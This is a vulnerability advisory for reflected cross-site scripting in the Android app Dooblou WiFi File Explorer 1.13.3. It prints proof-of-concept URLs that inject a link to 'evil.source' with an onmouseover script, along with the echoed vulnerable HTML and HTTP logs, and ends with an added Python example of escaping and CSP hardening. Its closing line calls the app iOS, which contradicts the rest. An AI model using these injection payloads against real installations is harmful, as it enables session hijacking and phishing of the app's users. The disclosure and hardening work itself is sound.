# Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

Reference (Source):
============================
www.vulnerability-lab.com

Release Date:
=================
2023-07-04

Vulnerability Laboratory ID (VL-ID):
==============================================
2317

Common Vulnerability Scoring System:
==============================================
5.1

Vulnerability Class:
============================
Multiple

Current Estimated Price:
================================
500€ - 1.000€

Product & Service Introduction:
========================================
Browse, download and stream individual files on your Android device using a web browser over a WiFi connection.
No more taking your phone apart to get the SD card out, or grabbing a cable to get at your camera pictures and copy over your favourite MP3s.

(Copy of the homepage: https://play.google.com/store/apps/details?id=com.dooblou.wififileexplorer)

Abstract Advisory Information:
======================================
The Vulnerability Laboratory Core Research Team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile Android WiFi web application.

Affected Product(s):
============================
Product Owner: Dooblou
Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (WiFi) (Web-Application)

Vulnerability Disclosure Timeline:
============================================
2022-01-19: Researcher Notification & Coordination (Security Researcher)
2022-01-20: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=====================
Published

Exploitation Technique:
================================
Remote

Severity Level:
===================
Medium

Authentication Type:
============================
Restricted Authentication (Guest Privileges)

User Interaction:
=====================
Low User Interaction

Disclosure Type:
=====================
Independent Security Research
Technical Details & Description:
=====================================
Multiple input validation web vulnerabilities have been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile Android WiFi web application.
The vulnerabilities allow remote attackers to inject their own malicious script code via a non-persistent attack vector to compromise browser-to-web-application requests on the application side.

The vulnerabilities are located in the `search`, `order`, `download` and further GET parameters. The content passed in the GET method request is not securely validated before it is returned in the response, so injected script code is executed. The attack vector is non-persistent and the request method to inject is GET. The attacker does not need any authorization to execute the attack and run malicious script code, for example in the front- and backend of the WiFi Explorer.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.
Proof of Concept (PoC):
================================
The input validation web vulnerabilities can be exploited by remote attackers without a user account and with low user interaction.
For security demonstration or to reproduce the web vulnerabilities, follow the information and steps provided below.

PoC: Exploitation
http://localhost:8000/storage/emulated/0/download/<a href='https://evil.source' onmouseover=alert(document.domain)><br>Please click path to return index</a>
http://localhost:8000/storage/emul...+HREF%3D%22HTTPS%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3CBR%3Eplease+click+path+to+return+index%3C%2FA%3E&x=3&y=3
Vulnerable Source: Execution Point
<table width='100%' cellspacing='0' cellpadding='16' border='0'>
<tbody><tr><td style='vertical-align:top;'>
<table style='background-color:#ffa81e; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position: top;' width='700' cellspacing='3' cellpadding='5' border='0'>
<tbody><tr><td><center><span class='doob_large_text'>Error</span></center></td></tr></tbody></table><br>
<table style='background-color:#b2b2b2; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position: top;' width='700' cellspacing='3' cellpadding='5' border='0'>
<tbody><tr><td><span class='doob_medium_text'>Cannot find file or directory! /storage/emulated/0/download/<a href='https://evil.source' onmouseover='alert(document.domain)'><br>Please click user path to return index</a></span></td></tr></tbody></table><br>
<span class='doob_medium_text'><span class='doob_link'>&nbsp;&nbsp;<a href='/'>&nbsp;Return to files&nbsp;</a></span></span><br></td></tr></tbody></table><br>
-
</li></ul></span></span></td></tr></tbody></table></div><div class='body-row scroll-x scroll-y'><table width='100%' cellspacing='0' cellpadding='6' border='0'>
<tbody><tr><td style='vertical-align:top;' width='100%'><form name='multiselect' style='margin: 0px; padding: 0px;' action='/storage/emulated/0/download/' enctype='multipart/form-data' method='post'>
<input type='hidden' name='filenames' value=''><table width='100%' cellspacing='0' cellpadding='1' border='0' bgcolor='#000000'>
<table width='100%' cellspacing='2' cellpadding='3' border='0' bgcolor='#ffffff'><tr style='background-color:#ffa81e; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position: top;' height='30'>
<td colspan='5'><table width='100%' cellspacing='0' cellpadding='0' border='0'><tbody><tr><td style='white-space: nowrap; vertical-align: middle'><span class='doob_small_text_bold'>&nbsp;</span></td>
<td style='white-space: nowrap; vertical-align: middle' align='right'><span class='doob_small_text_bold'>&nbsp;&nbsp;&nbsp;&nbsp;
<a href='?view=23&mode=<a href='https://evil.source' onmouseover='alert(document.domain)'><br>Please click path to return index&search='>
<img style='vertical-align: middle; border-style: none' src='/x99_dooblou_res/x99_dooblou_details.png' alt='img' title='Details'></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href='?view=24&mode=<a href='https://evil.source' onmouseover='alert(document.domain)'><br>Please click path to return index&search='>
<img style='vertical-align: middle; border-style: none' src='/x99_dooblou_res/x99_dooblou_thumbnails.png' alt='img' title='Thumbnails'></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href='?view=38&mode=<a href='https://evil.source' onmouseover='alert(document.domain)'><br>Please click path to return i
-
<td style='white-space: nowrap; vertical-align: middle'><input value='' type='checkbox' name='selectall' onclick='setCheckAll();'>&nbsp;&nbsp;&nbsp;<a class='doob_button'
href='javascript:setMultiselect('/storage/emulated/','','18&order=<a href=' style=''>Download</a>&nbsp;<a class='doob_button' href='javascript:setMultiselectConfirm('Are you sure you want to delete? This cannot be undone!',
'13&order=<a href='https://evil.source' onmouseover=alert(document.domain)'); javascript:document.multiselect.submit();' style=''>Delete</a>&nbsp;
<a class='doob_button' href='javascript:setMultiselectPromptQuery('Create Copy',
'/storage/emulated/','/storage/emulated/','','35&order=<a href='https://evil.source' onmouseover=alert(document.domain)','name');'
style=''>Create Copy</a>&nbsp;<a class='doob_button' href='x99_dooblou_pro_version.html' style=''>Zip</a>&nbsp;<a class='doob_button' href='
<td align='right' style='white-space: nowrap; vertical-align: middle'><span class='doob_small_text_bold'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href=''><img style='vertical-align: middle; border-style: none' src='/x99_dooblou_res/x99_dooblou_tree_dark.png' alt='img' title='Show treeview'></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href='?view=23&order=<a href='https://evil.source' onmouseover=alert(document.domain)'><img style='vertical-align: middle; border-style: none' src='/x99_dooblou_res/x99_dooblou_details.png' alt='img' title='Details'></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href='?view=24&order=<a href='https://evil.source' onmouseover=alert(document.domain)'><img style='vertical-align: middle; border-style: none' src='/x99_dooblou_res/x99_dooblou_thumbnails.png' alt='img' title='Thumbnails'></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href='?view=38&order=<a href='https://evil.source' onmouseover=alert(document.domain)'><img style='vertical-align: middle; border-style: none' src='/x99_dooblou_res/x99_dooblou_thumbnails.png' alt='img' title='Thumbnails'></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>
--- PoC Session Logs ---
http://localhost:8000/storage/emulated/0/download/<a href='https://evil.source' onmouseover=alert(document.domain)><br>Please click user path to return index/x99_dooblou_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8000/storage/emula...br>PLEASE CLICK USER PATH TO RETURN INDEX</a>
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
-
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: treeview=0
Upgrade-Insecure-Requests: 1
GET: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
-
http://localhost:8000/storage/emulated/0/download/<a href='https://evil.source' onmouseover=alert(document.domain)><br>Please click user path to return index/x99_dooblou_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8000/storage/emulated/0/download/%3Ca href='https://evil.source' onmouseover=alert(document.domain)%3E%3Cbr%3Eplease%20click%20user%20path%20to%20return%20index
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
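The error page above echoes the requested path into the HTML body without encoding, which is the execution point for the reflected injection. The following is an added example, not Dooblou's code and not part of the advisory: a minimal Python model of that error page in its vulnerable form (path echoed verbatim) and in a hardened form (path HTML-escaped before output, with a Content-Security-Policy that blocks inline event handlers), plus a parser-based check that reports which event-handler attributes a browser would actually attach. The function names, the reduced page markup and the sample request path are assumptions constructed for this example; the sample path carries the same kind of markup the advisory reflects.

```python
"""Reflected XSS in a file-explorer error page: vulnerable vs. hardened output.

Added example, not Dooblou's code. The handler names, the sample request path
and the reduced page markup are constructed to mirror the advisory's error page.
"""
from __future__ import annotations

import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample request path, URL-decoded the way a server sees it after
# routing. It carries the same kind of markup the advisory reflects into the page.
SAMPLE_PATH = unquote(
    "/storage/emulated/0/download/%3Ca%20href='https://evil.source'"
    "%20onmouseover=alert(document.domain)%3E%3Cbr%3Eplease%20click%20path%3C/a%3E"
)

# Reduced version of the advisory's error page; only the {path} slot matters here.
PAGE_TEMPLATE = (
    "<table><tr><td><span class='doob_medium_text'>"
    "Cannot find file or directory! {path}"
    "</span></td></tr></table>"
)


def vulnerable_error_page(requested_path: str) -> str:
    """Echoes the path verbatim into the HTML body: markup in the path becomes live markup."""
    return PAGE_TEMPLATE.format(path=requested_path)


def hardened_error_page(requested_path: str) -> str:
    """Same page, but the untrusted path is HTML-escaped (quotes included) before output."""
    return PAGE_TEMPLATE.format(path=html.escape(requested_path, quote=True))


def hardened_response_headers() -> dict[str, str]:
    """Defence-in-depth headers for the HTML response: a CSP without 'unsafe-inline'
    refuses inline handlers such as onmouseover=..., and nosniff keeps text/xml
    replies (like the signal-strength file in the session log) from being sniffed as HTML."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


class _EventHandlerFinder(HTMLParser):
    """Records every (tag, attribute) pair whose attribute is an on* event handler."""

    def __init__(self) -> None:
        super().__init__()
        self.handlers: list[tuple[str, str]] = []

    def handle_starttag(self, tag: str, attrs: list[tuple[str, str | None]]) -> None:
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name.lower()))


def injected_event_handlers(page: str) -> list[tuple[str, str]]:
    """Parses `page` as a browser would and returns the event handlers it would attach.
    An empty list means the reflected input stayed inert text."""
    finder = _EventHandlerFinder()
    finder.feed(page)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    print("vulnerable:", injected_event_handlers(vulnerable_error_page(SAMPLE_PATH)))
    print("hardened:  ", injected_event_handlers(hardened_error_page(SAMPLE_PATH)))
```

Run stand-alone, the vulnerable rendering yields one attached `onmouseover` handler on an `a` element while the hardened rendering yields none, because `html.escape` turns the angle brackets and quotes of the path into entities before the template is assembled. Output encoding at the template is the actual fix; the CSP and nosniff headers only limit the damage if an encoding site is missed elsewhere in the application.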
Security Risk:
===================
The security risk of the multiple web vulnerabilities in the iOS mobile WiFi web application is estimated as medium.